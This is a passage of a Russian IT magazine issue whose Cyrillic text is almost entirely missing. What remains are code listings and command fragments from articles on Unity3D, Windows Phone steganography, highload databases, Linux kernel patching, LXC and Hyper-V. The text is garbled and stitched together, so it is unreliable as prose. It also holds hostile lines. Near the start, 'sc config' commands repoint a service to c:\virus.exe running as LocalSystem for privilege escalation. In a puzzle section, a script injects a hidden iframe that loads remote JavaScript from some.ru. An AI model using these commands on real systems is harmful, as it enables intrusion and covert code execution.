, Windows SSDP uPnP, Local Service,
, ,
/ (
sc start/ sc stop),
config, binPath
exe :
CMD>sc config stupidService binPath=c:\virus.exe obj= \
".\LocalSystem" password=""
CMD>sc stop stupidService
CMD>sc start stupidService


. , ,
, Windows. - - Windows

Everyone .

, -
advapi32!SetFileSecurity ( ) c WRITE_DAC.
,

INT2e/SYSENTER. -
][.
,
-, , -, ,
NtLoadDriver, .
NtLoadDriver, ,
Se_Load_Driver_Privilege AdjustPrivilege(), .

INT2e/SYSENTER.
,

, AccessCheck, PrivilegeCheck,
AreAnyAccessesGranted , ? , :).

, - .

,
Windows , .
, , , , Microsoft.
. ! z

WWW

DVD

Windows Access Control


bit.ly/pjLau,
: bit.ly/NMQkoy bit.ly/VxYwtA.

,
DACL /
, .


Preview

100

.
,
.
Unity.
Unity? -,
,
. -,
. -
,
,

. ,
?

UNIXOID

1:M
1:N

1:N

105

WINDOWS PHONE

Windows Phone
.
,
.

UNIXOID

124



Linux Containers,
FreeBSD.
?


112

1:N

N:1

owner

0/1:N
0/1:N
N:M

5:

.

, ,
.

118


Linux
, .
?

SYN/ACK

128


Microsoft,
VMware Citrix.
.

133



.
Windows.



C# UNITY3D

- . , ,
, . ,

.

UNITY3D?



Unity3D. ,

. , ,

C#,
. , , Unity3D,
: unity3d.com.
, , .

Unity3D 3D- 2D-. ,


C#, JavaScript Boo,
Win/Mac/Linux, iOS, Android, Web ( -) . ,
. ,
.


, , : File New Project.


.
, , .


Unity3D, 3D-, ,
, 3ds Max, Maya
, (. . 1).
.
Scene
, Game ,
. Hierarchy
,
. Inspector , Project
, , : , , , (
), .
File Save Scene. Scenes ,
Scene1. Project
Scenes . ,

,
.
, Main Camera. Hierarchy
Position Transform
X = 0, Y = 0, Z = 10, Projection
Camera Orthographic,
Size 10. 2D-, ,
.
,
,
(0, 0, 0). .
.
,
. Unity3D ,

. 1. Unity3D


. , Game Object Create Other


Cube. (
, , ), X = 0, Y = 0, Z = 0.
Game, .
.
Project Materials,
, ,
, Player. Inspector , . !
Player Project
Cube Hierarchy. !
. ? .
, . Game Object Create Other
Directional Light. !
,
Directional Light .


. . Game
Free Aspect,
Standalone (1024 x 768) ,
- Scene,
,
.
Game. !
(0, 10, 0).
, .
,
.
Project Scripts,
C#,
PlayerScript. , Hierarchy , .
,
MonoDevelop
. , MonoDevelop

. 2.

Visual Studio
Unity3D.

Start() Update().
Start() , ,
, , Update()
. , Unity3D: bit.ly/MY5Pd0.
Start() ,
, Update() .


-.
Unity3D ,
, ,
. .
Unity3D Edit Project
Settings Input. Axes.
Horizontal,

(. . 2).
,
, a d
. ,

.

public float speed,

. Unity3D public-
,



Unity3D Inspector,
!
, ,
- .
Update() :
float move = Input.GetAxis("Horizontal") * speed * Time.deltaTime;
transform.Translate(Vector3.right * move);

? .
Input.GetAxis("Horizontal") 1 1,
( , ).
,
,
Time.deltaTime ,

. ,
, .
, FPS
. Translate
.
,
, . ,
transform.Translate(Vector3.right *
move);, Unity3D, , .

:
this.gameObject.transform.Translate(Vector3.right * move);

GameObject Unity3D.

GameObject.
Vector3 ,
. static- right,
,
Unity3D. Vector3.
right new Vector3(1, 0, 0),
, ? :)

.
!
. Unity3D
,
. X
,
. Update():
if (transform.position.x <= -13)
    transform.position = new Vector3(-13, transform.position.y, transform.position.z);
else if (transform.position.x >= 13)
    transform.position = new Vector3(13, transform.position.y, transform.position.z);

.

, -! Position Vector3
,
x, y z, ,
,
.
Vector3, .
Play .

,
. ?
,
Project.
.
,
.
Capsule,
:).
Projectile,
-
, . Z .
,
Z
, 0.
,
. Project New
Prefab, Projectile
Hierarchy Projectile
Projectile Project. ! ,
Hierarchy ,
.
: , .

.
,
Components Physics Rigidbody.
-
Rigidbody
. Use
Gravity. Unity3D,
,
Y,
.
Is Kinematic.
, , .
, :). . Projectile
:

public float speed;

void Update () {
    float move = this.speed * Time.deltaTime;
    transform.Translate(Vector3.up * move);
}


,

.
PlayerScript Update()
:
if (Input.GetKeyDown("space")) {
    Vector3 position = new Vector3(transform.position.x,
        transform.position.y + 1, transform.position.z);
    Instantiate(ProjectilePrefab, position, Quaternion.identity);
}

PlayerScript public GameObject, :


public GameObject ProjectilePrefab;

,
. , ,
. ,
.
(
this.gameObject?) Y
,
, .
Instantiate ()
. Instantiate . , GameObject
.
. ,
.
Vector3. .
,
Quaternion.identity,
.
,
, , .
. ,
,
, .
,
,
Destroy(this.gameObject);,
.
, .


.
(Game Objects
Create Other Sphere)


) .
-, ,
. ,
-
- ( Rigidbody), -
void OnTriggerEnter(Collider
other), , , . other ,
,
-.
Projectile ,

:

. 3.

!
.


. :
public float MinSpeed;
public float MaxSpeed;
private float currentSpeed;
private float x;
void Start() {
    SetPositionAndSpeed();
}
void Update() {
    float amtToMove = currentSpeed * Time.deltaTime;
    transform.Translate(Vector3.down * amtToMove);
    if (transform.position.y <= -10.5f) {
        SetPositionAndSpeed();
    }
}
public void SetPositionAndSpeed() {
    currentSpeed = Random.Range(MinSpeed, MaxSpeed);
    x = Random.Range(-12, 12f);
    transform.position = new Vector3(x, 10.8f, 0.0f);
}

,
, ,
,

.


Update() ,
, public
void SetPositionAndSpeed(). public, ,
.

,
Random. , , ,
transform.position.
, public void
SetPositionAndSpeed() ,
, , ,
.
Unity3D
Inspector
public (, 5 10)
.
! , ,
. ,
.
.


Asteroid,
Sphere Collider,
Is Trigger. , ,
Tag Add tag. Tag
enemy.
,

.
Is Trigger ,
(,

void OnTriggerEnter(Collider other) {
    if (other.tag == "enemy") {
        Asteroid enemy = (Asteroid)other.gameObject.GetComponent("Asteroid");
        enemy.SetPositionAndSpeed();
        Destroy(this.gameObject);
    }
}

,
.
enemy
GetComponent() Asteroid, public-
SetPositionAndSpeed();,
.
Destroy(),
(
Destroy() , , this.gameObject,
).

. , .
.
, ,
. Unity3D
.
,
- . ,
,
void OnTriggerEnter(Collider other),
, .
,
.
,

(. . 3). PlayerScript
void OnTriggerEnter(Collider
other),
, ,

:
void OnTriggerEnter(Collider other) {
    if (other.tag == "enemy") {
        Asteroid enemy = (Asteroid)other.gameObject.GetComponent("Asteroid");
        enemy.SetPositionAndSpeed();
    }
}

. 5.


0, .
Lose
Lose (-,
!):

public Texture backTexture;

. 4.
Rigidbody,

-. Rigidbody
Use Gravity, Is
Kinematic .

GUI
? . , ? , ,
.
.
File Build settings
Add current. (File New Scene)
Scenes Lose.
Build
Settings. ,
1, 0. ,


void OnGUI() {
    GUI.DrawTexture(new Rect(0, 0, Screen.width, Screen.height), backTexture);
}

OnGUI() , .
DrawTexture GUI
. ,
,

. public-.

. ,
, , .
? , Project, Project

public- backTexture
(. . 5). !
Lose .
. ,
. Scene1,
PlayerScript void
OnTriggerEnter(Collider other) enemy.SetPositionAndSpeed();
. :
Application.LoadLevel(1);, 1
Build Settings, .

,
.
!


, ,
,
,
!

Unity3D, , , ,
. z


yurembo , GenomeGames (www.pgenom.ru)

Windows Phone



, , , .
, .
, . ,
,
?


,
Hello world, , ,
.
, , .

: : ,
, ( ),
, .
. , ,

.
, ,
Panorama Pivot, .

.
.
.

. , ,
,
, , . , .

.
. ,
.
,
.


Windows Phone
.
CameraCaptureTask,
(Chooser).
Windows Phone.
.
( ). ,
CameraCaptureTask .
. PhotoCamera
.

. 1.


, ,
. ,
, /
.
.

LET THE BATTLE BEGIN!


. VS 2010, ,
Windows Phone Application. ,
: TextBox, Image, ListBox Button,
- (. 1).
,
: AcceptReturn True, TextWrapping
Wrap.
. .

Add New Item.
,
,
Windows Phone Landscape Page, (PhotoCapture)
Add .
XAML-. ( Grid) :
<Canvas x:Name="Canvas" Width="700"
        HorizontalAlignment="Center" Margin="14,12">
    <Canvas.Background>
        <VideoBrush x:Name="PhotoViewer" />
    </Canvas.Background>
    <toolkit:GestureService.GestureListener>
        <toolkit:GestureListener DragCompleted="OnDragCompleted" />
    </toolkit:GestureService.GestureListener>
</Canvas>

,
, . , Background,
VideoBrush (. 2).
.

, .
,
(
).
toolkit, Windows Phone
Toolkit (silverlight.codeplex.com/releases/view/75888).
, Microsoft.Phone.

. 2.


Windows Phone

Controls.Toolkit.dll, c:\
Program Files (x86)\Microsoft SDKs\Windows Phone\v7.1\Toolkit\
Oct11\Bin\. XAML-
: xmlns:toolkit="clr-namespace:Microsoft.Phone.
Controls;assembly=Microsoft.Phone.Controls.Toolkit".

. :
,
, .
. C#-
:
private void OnDragCompleted(object sender, DragCompletedGestureEventArgs e) {
    this.NavigationService.Navigate(new Uri("/MainPage.xaml", UriKind.Relative));
}

, MainPage.xaml. URI
, .
,
, . MainPage.xaml,
, : this.NavigationService.
Navigate(new Uri("/PhotoCapture.xaml", UriKind.Relative));.
, PhotoCapture ,
,
. ,
:),
,
.
Microsoft.Devices,
, .
PhotoCapture : PhotoCamera myCam;.
OnDragCompleted : OnNavigatedTo
, (
), OnNavigatingFrom ( ).
, :
if (PhotoCamera.IsCameraTypeSupported(CameraType.Primary) == true) {
    myCam = new Microsoft.Devices.PhotoCamera(CameraType.Primary);
    PhotoViewer.SetSource(myCam);
}
myCam.Initialized += new EventHandler<Microsoft.Devices.CameraOperationCompletedEventArgs>(myCam_Initialized);

:
, ( ? WP
, ,
), .


,

?

VideoBrush
.
, . , , ,
.
( ):
if (myCam != null) {
myCam.Dispose();
myCam.Initialized -= myCam_Initialized;
}

( ,
), , . ,
,
. : myCam.FlashMode
= FlashMode.On;
.
IEnumerable<Size> resList = myCam.AvailableResolutions;
Size res;
res = resList.ElementAt<Size>(5);
myCam.Resolution = res;

.
. , 1600 1200.
.
,
. ,
, ,
. , .
? , .

. OnNavigatedTo CaptureImageAvailable AutoFocusCompleted.
,
,
,
.
, , CameraButtons. ,

: CameraButtons.ShutterKeyPressed +=
OnButtonFullPress;. : ShutterKeyHalfPressed , ShutterKeyReleased .

OnNavigatingFrom.
.
, . API-
: myCam.Focus();.
myCam.CaptureImage();
. : myCam.CancelFocus();.
,
-,
.
. , WP


. 3.

()
(). , ,
. ,
.

, ( ).

. ,
MainPage.xaml.cs (OnNavigatedTo OnNavigatingFrom)
OnNavigatedTo PhotoCapture.xaml.
cs (. ) (. 3).


CaptureImageAvailable
.
, . . ,
:
void myCam_CaptureImageAvailable(object sender, Microsoft.Devices.ContentReadyEventArgs e) {
    ...
}

, , .
PhotoCamera,
, . , , . RGB, -,
Windows Phone
JPG, .
, 24- :
. ( )


.
,

. ,
, -.

, .

,
GUI, :
Dispatcher.BeginInvoke(delegate() {
...
});

, .
WriteableBitmap.
,
.
BitmapImage,
, : BitmapImage
bi = new BitmapImage();.
: bi.SetSource(e.ImageStream);.
WriteableBitmap: WriteableBitmap
wb = new WriteableBitmap(bi);. Silverlight
WriteableBitmap . ,
SetPixel. , WriteableBitmapEx
Code Plex (writeablebitmapex.codeplex.
com). ( , GetPixel SetPixel),
: DrawLine, DrawRectangle .


Windows Phone

, NuGet Manager (. ).
PM> Install-Package
WriteableBitmapEx. ,
. ,
.
Stream,
. GetStream (. ),
,
. ,
.
,
. ,
GetStream .
, . ,
- , .

. .
,
WriteableBitmap, HideTextInImage.
. .

(0, 0) .
.
Color FromArgb,

. ARGB.
RGB.
,
255 . ,
.
.
.
currentKeyByte . . , ,
.
.
: ,
Y,

X .
. .

, .
SetColorComponent. :
(0-R, 1-G, 2-B)
.

FromArgb.
, HideTextInImage,
.
,
SetColorComponent. ,
.


,
( ,
, ,
).
-,

. -,
, ,
. -, ,
.
, ,
. ,
.
,
.

.
, WP.
/ -.
. ! z
WWW
www.codeplex.
com Microsoft
Open Source
,


Microsoft.

NUGET MANAGER
. NuGet Manager.
, .NET-
Visual Studio. NuGet / , ,
. NuGet , .
NuGet Manager, Extension Manager (Tools Extension Manager),
Online Gallery, nuget.
,
(NuGet Manager Package) Download.
, (. 4). , ,
NuGet, Extension Manager,
NuGet- .


DVD


PhotoMaker,



.

. 4. NuGet Manager


(ivinside.blogspot.com)


,

: -,
, , -,
,
.

B, A, -
. , , ,
.

? .
class A:
    def __init__(self, v):
        self.__q = set(v)

    def getval(self):
        v = self.__q.pop()
        yield v

class B(A):
    def getval(self):
        for v in self.__q:
            yield v

b = B('qwerty')
print [c for c in b.getval()]

print, Python ,
. :
Traceback (most recent call last):
  File "q1.py", line 15, in <module>
    print [c for c in b.getval()]
  File "q1.py", line 11, in getval
    for v in self.__q:
AttributeError: B instance has no attribute '_B__q'.

, B '_B__q'.
, __q for v
in self.__q.


<script>
(function(url) {
    var iframe = document.createElement('iframe');
    (iframe.frameElement || iframe).style.cssText =
        "width: 0; height: 0; border: 0";
    var target = document.getElementsByTagName('script');
    target = target[target.length - 1];
    target.parentNode.insertBefore(iframe, target);
    var d = iframe.contentWindow.document;
    d.open().write('<body onload="'+
        'var js = document.createElement(\'script\');'+
        "js.src = '"+ url +"';"+
        'document.body.appendChild(js);">');
    d.close();
})('http://some.ru/script.js');
</script>

url,
'http://some.ru/script.
js'. :
iframe
. :
<body onload="var js = document.createElement('script');
js.src = 'http://some.ru/script.js';
document.body.appendChild(js);">


, http://some.ru/script.js.
.
(,
, ) (
,
). iframe
, , , ,
.
,
.

3 5 . 4 ?

2 5-. 5-
3-
, . 4 5- .
(
) 3-
5- . 5- , ( 3-
1 ). 5- . 1 5-
. 3-
5- ,
4 .

, , .
1 . , .
.
2 1 3 . , .
, ! 5 ,
3- ,
. 5-
2 . , ,
3-

C . ,
.
- . - ,
.
.
.
,
. ,
. , ,
. z


1.
1)
2)
3)
4)
5)

String-, :
;
;
;
( strcmp);
,
;
6) stream << .
2. :
#!/usr/bin/python
def is_letter(char):
    letters = 'abcdefghijklmnopqrstuvwxyz'.split(None)
    if str(char).lower() in letters:
        return True
    else: return False
def wc(s):
    l = w = c = 0
    for i in range(len(s)):
        char = s[i]
        c += 1
        if not is_letter(char) and not \
           (is_letter(s[i-1]) and
            is_letter(i+1) and (char is '-'
            or char is '\'')):
            w += 1
        if char == '\n':
            l += 1
    return '%d\t%d\t%d\n' % (l, w, c)
if __name__ == "__main__":
    import doctest
    doctest.testmod()

,
. ,
.
, ,
.
3. , .
,
. ,
. ,
. :
1) ;
2) ;
3) ;

4) ;
5) ;
6) , .
?
4. .
:
, , ,
.
,
,
,
.
( , )
,
,
, .
, -
. , .
? ( ,
,
.)


. -

,,



-
.


. 5



,
- . ,
. ?
, , ,
, . ,
( )
,
, .
.
? master-master
?
?
,
, .
,
.
,
,
. ,
, .


,
, , , , .

, , .
, ? ,
, .
, , .
, :
. .
, , ( )
, . ,
.
. MySQL PostgreSQL. , 3040 .
Mongo, Redis, Neo4j.
MySQL PostgreSQL.
? , .
,
, . ,
.
,
. , MongoDB,
. ?
, .
, . MongoDB ,
, .


?

.

.
,
, -,

,
?

.




.
,
.

, .
, , ,
/ , .
,
.
?

PostgreSQL

.

,
.
SQL-, SQL-.
,

.

.


:


.

.
,

,
,
,
.
,
, .

,
, share
nothing stateless.


:
;
:

;
:
;
- : ,



, ,
, ,
.
, , , , Photosight.ru .
,
,
.
. ,

.

N:2

1:N

1:N

N:M

1:N

1:N

1:M

,
, . , , .
. , .

join , ?
. . ,
. ,
, ,
.
. ,
. join
?
.
,
?
, , , ,
.

, . ,
,
, .
. , -
. , , ,
. ,
.
.
? , , , , ?
.
-.

.
, .
, , (
, , ), . .
, ,
.


1:N

1:N

N:1

owner

1:M
N:M

0/1:N
0/1:N

1:N

N:M

1:N

N:M

N:M

N:1

N:1

: ,
, .
:
1.
2.
3.
:
1. , ,
2. -,
3. -, ,
.

, , ,
.

.
. -

,
.
,

. ,
, -


. 5

, , .
, , .
, ,
. ,
, , .
Lady Gaga
Facebook. Lady Gaga 69,
.
, .
Lady Gaga
,
Lady Gaga , ,
Lady Gaga.
,
.


,

. , 100 .
,
. , 10 MySQL. MySQL
100 , 10, 20, 100 . , .
,
( )
, , .
. ,
.
.
back-end (-) .
,
back-end , , .


,
. (,
, -
).
,
, .

,
,

, ,
-,
,
.
,
, -

HIGHLOAD-

Highload.


,
-.
HighLoad++ (www.highload.ru).
, ,

.
.


,


MySQL,

.
MySQL

. MySQL
5.5. Mail.Ru
NoSQL
Tarantool,
500600 .
Open Source
.


,

,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .

-

.
,

,
.
-

, ,
-
.


- ,
, . ,
.
, .
, .
,
.
-, ,
,
.
.
, . ,
, - . , .
, ( )
. .

MongoDB

MongoDB

Push-

MongoDB

AJAX

MongoDB

MongoDB

MongoDB


Badoo (140 ),
. ,
. ,
, .
?
, ,

.
: 10 , .
, ,
, . ,
10 .

.
, .
,
. .
.
.
. ( ).
,
.
,
?
- .
, , , - .
,
, ( , !)
.
.
,
, ()
, .

, ,
. ,
,
.


. ,
. ,
. , ,
. , -,
. , ,
. ,
,
.

.
. , ,
, NoSQL .

. ,

. ,
-
. ,
.

, -

. ,
.

.

. ,
,
.

.



, .


. 5

, ,
. , ,
-.
, , . , ,
.
, ,
, . (
, ) :

. ,
, SQL-:
, .
Facebook .
,
,
news feed.
. ,
- . , , : ,
- .
.
, ,
.
, ,
.

MYSQL

MySQL. , .
,
, ,
.
80 ,

, MySQL. ,
1000 20
100 , 2
.
,

- :
. , ,
, SQL-,
;
. .

.
, 12 . , :

;
, MySQL
,
, production ,
, .




,
,

,


.

,


.
-
.

MySQL
unrolling,
replication log
(CALL
GetUserComet(480145)), ,

. ,
,

.
,

MySQL

,

.



, ,
.
,
, .
, ?



, , .

.

.

. , ,
,
.
, ,

. ! z


UNIXOID

(rommanio@yandex.ru)

Julien Harneis


LINUX

, Linux ,
.
, , .
:
, , ,
? ,
. .
, , , -
(SSD-). ,



, Reiser4.
: , ,
? : !
. -
,
( !) GPL,
. ,
, . , , . , , ?
.
, ?
, Zen kernel (


BFS CFS (2009)

Zen kernel Vim. aufs_init()

liquorix), pf-kernel,
rt-preempt, grsecurity , , .
, ,
(UnixBench) , John the Ripper, GZip
MPlayer.
, , ,
.

, sum df du
,
.
Linux-PHC . , NHC Rightmark RMClock Windows.
.
Reiser4 . :
dancing tree,
, ,

.
SLQB . ,
, SLAB SLUB.
, ,
.
FatELF (,
, ELF),
. Mac OS X universal binary.
fbcondecor , -, ! , ,
.

ZEN KERNEL LIQUORIX


Zen kernel (zen-kernel.org)
. , .
? (,
):
Zen-sched , , , BFS (
pf-kernel)
CFS
, Boost
.
BFQ , /.
(, ,
) . ,
,
, .
AUFS2 ,

.
, . , , .
, :
, /media/new, /media/DATA,
.
:
$ sudo mount -t aufs -o \
br:/media/new=rw:/media/DATA=rw,\
create=mfs,sum none /media/union

?
/media/new /media/DATA /media/union, create=mfs , ,


Zen kernel Ubuntu


12.04 3.3, ,
- . ,
.
:
$ wget http://www.kernel.org/pub/linux/kernel\
/v3.x/linux-3.3.tar.gz && tar xzvf \
linux-3.3.tar.gz

, 3.3 -
.
, , , git:
$ cd linux-3.3
$ git init
$ git add .
$ git commit -m "Initial commit"


UNIXOID
.
: FB_S3 S3, FB_VT8623 VIA FB_ARK
ARK Logic. .
CONCURRENCY_LEVEL=n, n ,
, ccache, ( ):
$ CC="ccache gcc" CXX="ccache g++" CONCURRENCY_LEVEL=2 \
fakeroot make-kpkg --initrd --append-to-version=-my kernel_image kernel_headers
$ sudo dpkg -i ../linux-image-3.3.8-zen-my+_3.3.8-zen-my+-10.00.Custom_i386.deb \
../linux-headers-3.3.8-zen-my+_3.3.8-zen-my+-10.00.Custom_i386.deb
pf-kernel I/O-

:
$ git checkout -b zen-kernel

3.3,
:
$ wget http://downloads.zen-kernel.org/snapshots\
/v3.3_master.diff.gz
$ zcat v3.3_master.diff.gz | patch -p1 --dry-run

, ,
'--dry-run'. :
$ git add . -A
$ git commit -m "Initial commit in branch zen-kernel"

(
, ) make
menuconfig:
$ cp /boot/config-$(uname -r) ./.config
$ make menuconfig

configure standard kernel features


(expert users) General Setup kernel debugging kernel hacking
. General
Setup , BFS, Zen-Tune. SLQB . AUFS.
File systems Misc. Filesystems. (
127 ).
fbcondecor, Tile Blitting,

liquorix. ,
Zen,
, . Makefile Zen kernel,
-.

PF-KERNEL
, pf Packet filter,
, , .
post-factum. :
-ck , BFS. EEVDF:
. CFS, -
, 16 .
, bit.ly/1dGHHt , .
BFQ , .
TuxOnIce ,
, , -, , ,
(,
, ), - -
? . , TuxOnIce
Linux. , ,
, , ,
.
IMQ ,
. , , -
. IMQ? , , ,
.
l7-filter Netfilter
. P2P-


kernel-netbook (bit.ly/nNL1SA ) Linux-,
, Asus Eee PC, Acer
Aspire One, MSI Wind, Samsung N-, Dell Mini.
,
(broadcom-wl, stk11xx)
(firmware).
Arch Linux.
rt-preempt preemption model


Skype, Torrent, eDonkey, Kazaa.


, -, , .
3.5
,
UKSM (Ultra Kernel Samepage Merging)
KernelDedup (kerneldedup.org). UKSM , 50100 ,

, ( ).
pf, git, :
$ wget http://pf.natalenko.name/sources/3.3/patch-3.3.6-pf.bz2
$ bzcat patch-3.3.6-pf.bz2 | patch -p1

configs
ASUS G73SW, Dell Inspiron 1525 Samsung
NP900X3A. , . menuconfig.


Kernel Mode Linux (bit.ly/wT04M3)

. ,

.
LIDS (bit.ly/9Qr3NK) .
BadRAM (bit.ly/6jgzno) .
MOSIX (bit.ly/PdM4eq)
(, ).
CPUSETS (www.bullopensource.org/cpuset) 2.6,
CPU
( ) SMP-.

QNET, QoS and Netfilter patchset Linux 2.6.x


(www.opennet.ru/prog/info/2339.shtml),

Linux kernel patch Openwall


(www.openwall.com/linux/README.shtml).

$ make menuconfig

BFQ Enable the block layer IO


Schedulers. , . :
Default I/O Scheduler. TuxOnIce.
Power management Enhanced Hibernation.
Linux ,
. ,
, Checksum pageset2
. l7-filter,
Networking support Networking options Netfilter Core
Netfilter Configuration. ,
.

RT-PREEMPT
rt , ,
realtime. , ,
, , . ?
,
. rt-preempt Linux
. ,
:
-
.
,
, , , .

: bit.ly/MIdjk9.
, , , .

.
. softirq-
. (,
),
- .

3.0, 3.2 3.4.
( git ):
$ wget http://www.kernel.org/pub/linux/kernel\
/projects/rt/3.2/older/patch-3.2-rt10.patch.gz
$ zcat patch-3.2-rt10.patch.gz | patch -p1

, .
menuconfig
Processor type and features. , High Resolution Timer Support. Preemption model
Preemptible kernel Fully preemptible
kernel. ,
. , ,
. Kernel hacking,
. menuconfig ,
.

GRSECURITY

grsecurity


Grsecurity (bit.ly/4uMMYc), ,
2001
Openwall Solar
Designer. , PaX
RBAC
, SELinux. ,
.
/dev/mem, /dev/kmem /dev/port (
). /
ioperm/ioml,


UNIXOID

grsecurity

.
.
PaX ,
kernel panic ( ),
,
,
UID.
/proc. , ( /
) ,
.
chroot. , , chroot, chroot, mknod
TPE , root
, .
TCP/UDP blackhole RST/ICMP,
. , , "-j DROP" iptables.
ASLR ,
, mmap().

UnixBench

Customize Configurations. ,
, ( gradm,
grsecurity),
, / .
grsecurity
gcc, :
$ sudo apt-get install gcc-4.6-plugin-dev

grsecurity 3.2. (- git


):

, .
, Zen kernel .
? , , Zen kernel,
. pf-kernel .
.

, ,
, . rt-preempt .
grsecurity , ,
. ,
. z

$ wget http://www.kernel.org/pub/linux/kernel/v3.0/patch-3.2.27.bz2
$ bzcat patch-3.2.27.bz2 | patch -p1
$ wget http://grsecurity.net/stable/grsecurity-2.9.1-3.2.27-201208151951.patch
$ patch -p1 < grsecurity-2.9.1-3.2.27-201208151951.patch

, ,
.
menuconfig Security options Grsecurity . Configuration method Automatic, Usage
Type , . Default
Special Groups GID, /proc. ,

               John the Ripper (FreeBSD MD5)   MPlayer   Gzip     UnixBench
Ubuntu 12.04   8307                            12,584    38,105   467,6
Zen kernel     7312                            14,876    37,435   509
pf-kernel      8284                            12,137    38,590   490,4
rt-preempt     8198                            13,028    38,989   324,2

WARNING

DVD

grsecurity
X.Org,

.


UNIXOID

(execbit.ru)

LXC



, ,
,
.
,
.
,
LXC.

.

?
LXC Linux, FreeBSD Jail, Solaris Zones OpenVZ,
, .
Linux cgroups
( 2.6.29) ,
OpenVZ. LXC
Linux-,
, ,
, , ,
. cgroups
,
.
LXC .
,
,
,
. LXC
,

,
,
.

! ?

Linux . VirtualBox,

. OpenVZ,
, QEMU,
.
: VirtualBox QEMU
, OpenVZ
, , chroot
VServer, , .
, LXC (Linux Containers), .


, LXC, , ,
bridge-utils debootstrap,
Debian
Ubuntu:
# apt-get install lxc debootstrap bridge-utils

debootstrap
febootstrap,
Fedora. , , .
:


LXC-

# ifconfig eth0 down


# brctl addbr br0
# brctl setfd br0 0

# echo "cgroup /sys/fs/cgroup cgroup defaults 0 0" >> /etc/fstab
# mount cgroup

(eth0):

lxc-checkconfig, ,
LXC:

# brctl addif br0 eth0


# ifconfig eth0 0.0.0.0 up

# lxc-checkconfig

IP-,
eth0:
# ifconfig br0 192.168.1.2/24 up
# route add default gw 192.168.1.1

,
/etc/network/interfaces:
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
#
bridge_ports eth0
bridge_stp off
bridge_fd 0
# IP-
address 192.168.1.2
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

K ,
enabled (. LXC), , ().
lxc-create, . , LXC,
,
. LXC
, /usr/lib/lxc/templates/. , ,
'-t' lxc-create,
lxc-. :
# lxc-create -n node01 -t ubuntu

node01 , ubuntu . ,
, '--help'.
# lxc-create -t ubuntu --help

DHCP,
, iface br0 inet static
iface br0 inet dhcp. LXC , cgroup . Ubuntu
,
/etc/fstab:


/var/lib/lxc/node01/.
rootfs,
fstab ( LXC
/etc/fstab ). config,
.
:

fstab

# (hostname)
lxc.utsname = node01
# (Ethernet)
lxc.network.type = veth
#
lxc.network.flags = up
# br0
lxc.network.link = br0


UNIXOID
3. LXC,
:
# invoke-rc.d lxc start

,
( -), .
:

# IP-
lxc.network.ipv4 = 192.168.2.50/24


MAC-:
lxc.network.name = eth0
lxc.network.hwaddr = ac:de:48:00:00:01

DNS- /etc/resolv.conf
:
# echo nameserver 8.8.8.8 > \
/var/lib/lxc/node01/rootfs/etc/resolv.conf

.
:
# lxc-start -n node01

, :
# lxc-console -n node01

root.
: , , .
:

# lxc-cgroup -n node01 memory.limit_in_bytes 128M


# lxc-cgroup -n node01 cpu.shares 512
# lxc-cgroup -n node01 cpuset.cpus 1

,
:
lxc.cgroup.memory.limit_in_bytes = 128M
lxc.cgroup.cpu.shares = 512
lxc.cgroup.cpuset.cpus = 1

, , 128 ,
, ,

cgroup
cpu.shares ( ,
, ,
cgroup). ,
( )
, cpu.shares.
cpu.shares 512,
1024, , ,
1, 2. ,
,
. , ,
, , 0,3 ( ).
, swap-:
lxc.cgroup.memory.memsw.limit_in_bytes = 128M

# lxc-stop -n node01

, :
# lxc-destroy -n node01

TIPSNTRICKS
,
,
. Ubuntu :
1. LXC :
# echo RUN=yes >> /etc/default/lxc

2.
/etc/lxc/auto/. ,
:
# ln -sf /var/lib/lxc/node01/config \
/etc/lxc/auto/node01


,
, .
,
/var/lib/lxc/ . :
# cd /var/lib/lxc
# cp -a node01 node02
# vi node02/{config,fstab}

LXC lxc-clone,
, IP. .
LXC
,
. ,
/bin/ls node01,
:
# lxc-execute -n node01 /bin/ls

,
,
.
, lxc-attach:

/tmp /var/lib/lxc/node01/rootfs/tmp none ro,bind 0 0

/tmp ,
( .X11).
2. :
$ xhost +


, , ,
(, -,
).
3. , Xephyr,
.
4. Xephyr :
DISPLAY=:0 Xephyr :2 -screen 1024x768 -dpi 96
DISPLAY=:2 xfce-session

X WINDOW

Xephyr 1024 x 768,


( Xfce). , Xephyr,
(Xephyr
, ,
).

LXC
, , X- Xephyr,
, X-
. :
1. fstab (, /var/lib/
lxc/node01/fstab), :

, LXC. ,
, , ,
. z

# lxc-attach -n node01 /bin/ls

INFO

LXC-

LXC

lxc-attach
lxc-cgroup cgroup-
lxc-checkconfig LXC
lxc-clone
lxc-console
lxc-create
lxc-destroy
lxc-execute

lxc-freeze
lxc-info
lxc-kill kill
lxc-ls ls
lxc-monitor
lxc-netstat
lxc-ps ps
lxc-restart
lxc-setcap Capabilities
lxc-start
lxc-stop
lxc-unfreeze
lxc-version LXC
lxc-wait ( )

Linux-,
LXC ,
. cgroups,

,
SGI cpusets,
Google
. ,
namespaces ( )

, Parallels ( OpenVZ)
IBM. , ,
Linux
, LXC,

, Linux.


Ubuntu Debian


apt-cacher-ng



,


.



,


: lxc-freeze -n node01; lxc-unfreeze -n node01.


SYN/ACK

(grinder@synack.ru)


,

, , , ,
,

. ,

, : , ,

.

. , .


Win2012

HYPER-V 3.0
Windows Server 2012
Hyper-V 3.0,
.
, MS
, , .
, .
:
1 ( 64 ) 64 vCPU
( 4), - 4 320 CPU, Failover
Cluster 64 4000 VM
( 1000). , , .
Linux (Red Hat /
CentOS, SUSE, Ubuntu) FreeBSD.
VHD,
VirtualPC, 2 T,
. Win2012
VHDX, 64 ,

. Windows- 2012 ,
2 , 4
512e.
VHDX Offloaded
Data Transfer (ODX), vStorage API for Array Integration
VMware. , , SAN.
VM virtual SCSI
, IDE .
, ][, Win2012
. ,
Scale-Out File Server VM, ,
.
Hyper-V, ,

.
C , , ? Hyper-V 3.0 Replica,

VM. : SAN,

. C :


Hyper-V NUMA

, VM
(Delta Replication).
,
( , ). Volume Shadow Copy (VSS),
VM.
Hyper-V Replica : Replication Engine,
, Change Tracking, Network Module,
HTTP/HTTPS-, Management Experience.
VM
HVR Broker role.

,
, VM
. Live
Storage Migration

(Live Migration Without Shared Storage).
,
. ,
VM ( USB-)
shared storage.
, .
, VM,
, .
CPU, .
, VM, .
SR-IOV (Single Root I/O Virtualization)
VM
,
, . SR-IOV
,
VM .
NUMA (Non-Uniform Memory Access) ,
CPU
. VM NUMA, ,
.
, , ,

, , -


VMware vSphere Client

VMware vSphere

.
, VM ,
.
